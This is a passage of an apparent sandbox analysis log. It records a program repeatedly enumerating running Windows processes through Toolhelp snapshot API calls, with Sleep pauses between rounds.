pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0133.440] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0133.441] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0133.443] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0133.444] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0133.445] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0133.447] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0133.448] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0133.450] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0133.451] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0133.515] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0133.516] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0133.517] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0133.518] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0133.519] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0133.520] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0133.521] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.522] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0133.523] CloseHandle (hObject=0xc4) returned 1 [0133.523] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0133.528] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.529] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0133.530] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0133.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0133.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0133.532] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0133.533] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0133.534] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0133.535] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0133.536] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0133.537] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.537] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.538] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.539] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.540] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.541] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0133.542] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.543] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.543] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0133.545] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.546] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0133.548] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0133.549] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0133.551] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0133.552] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.554] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0133.555] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0133.557] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0133.559] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0133.560] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0133.611] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0133.612] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0133.613] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0133.614] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0133.615] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0133.616] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0133.617] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0133.618] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0133.619] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0133.620] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0133.622] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0133.623] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0133.624] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0133.625] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0133.626] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0133.627] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0133.628] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.629] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0133.630] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0133.631] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0133.632] CloseHandle (hObject=0xbc) returned 1 [0133.632] Sleep (dwMilliseconds=0x12c) [0133.999] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0134.005] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.006] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0134.006] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0134.007] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0134.008] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0134.009] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0134.010] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0134.011] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0134.011] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0134.012] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0134.013] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.014] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.015] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.016] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.017] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, 